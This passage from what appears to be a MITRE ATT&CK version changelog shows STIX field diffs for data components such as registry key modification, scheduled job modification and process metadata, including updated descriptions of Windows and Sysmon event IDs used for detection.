- Event ID 4660 - Object Deleted: Logs when a registry key is deleted.
- Sysmon (System Monitor) for Windows
- Sysmon Event ID 12 - Registry Key Deleted: Logs when a registry key is removed.
- Sysmon Event ID 13 - Registry Value Deleted: Captures removal of specific registry values.
- Endpoint Detection and Response (EDR) Solutions
- Monitor registry deletions for suspicious behavior. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a Registry Key and/or Key value (ex: Windows | t | Changes made to an existing registry key or its values. Thes |
| EID 4657 or Sysmon EID 13|14) | | e modifications can include altering permissions, modifying |
| | | stored data, or updating configuration settings. *Data Coll |
| | | ection Measures:* - Windows Event Logs - Event ID 4657 |
| | | - Registry Value Modified: Logs changes to registry values, |
| | | including modifications to startup entries, security setting |
| | | s, or system configurations. - Sysmon (System Monitor) for W |
| | | indows - Sysmon Event ID 13 - Registry Value Set: Captur |
| | | es changes to specific registry values. - Sysmon Event I |
| | | D 14 - Registry Key & Value Renamed: Logs renaming of regist |
| | | ry keys, which may indicate evasion attempts. - Endpoint Det |
| | | ection and Response (EDR) Solutions - Monitor registry m |
| | | odifications for suspicious behavior. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:11:59.993Z |
| description | Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14) | Changes made to an existing registry key or its values. These modifications can include altering permissions, modifying stored data, or updating configuration settings.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4657 - Registry Value Modified: Logs changes to registry values, including modifications to startup entries, security settings, or system configurations.
- Sysmon (System Monitor) for Windows
- Sysmon Event ID 13 - Registry Value Set: Captures changes to specific registry values.
- Sysmon Event ID 14 - Registry Key & Value Renamed: Logs renaming of registry keys, which may indicate evasion attempts.
- Endpoint Detection and Response (EDR) Solutions
- Monitor registry modifications for suspicious behavior. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Patches
Asset: Asset Inventory
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21T21:47:58.629Z | 2025-04-18T15:11:50.339Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_domains[0] | enterprise-attack | ics-attack |
Operational Databases: Device Alarm
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-11T16:22:58.802Z | 2025-04-16T21:26:36.998Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Logon Session: Logon Session Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:12:23.075Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Operational Databases: Process History/Live Data
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-11T16:22:58.802Z | 2025-04-16T21:26:36.842Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:37.873Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Operational Databases: Process/Event Alarm
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-05-11T16:22:58.802Z | 2025-04-16T21:26:36.694Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:39.543Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Modification
Current version: 1.0
|
|
|---|
| t | Changes made to a scheduled job, such as modifications to th | t | Changes made to an existing scheduled job, including modific |
| e execution launch (ex: Windows EID 4702 or /var/log cron lo | | ations to its execution parameters, command payload, or exec |
| gs) | | ution timing. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:40.267Z |
| description | Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs) | Changes made to an existing scheduled job, including modifications to its execution parameters, command payload, or execution timing. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Metadata
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:51.004Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Asset: Software
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21T21:47:33.604Z | 2025-04-18T15:11:53.563Z |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_domains[0] | enterprise-attack | ics-attack |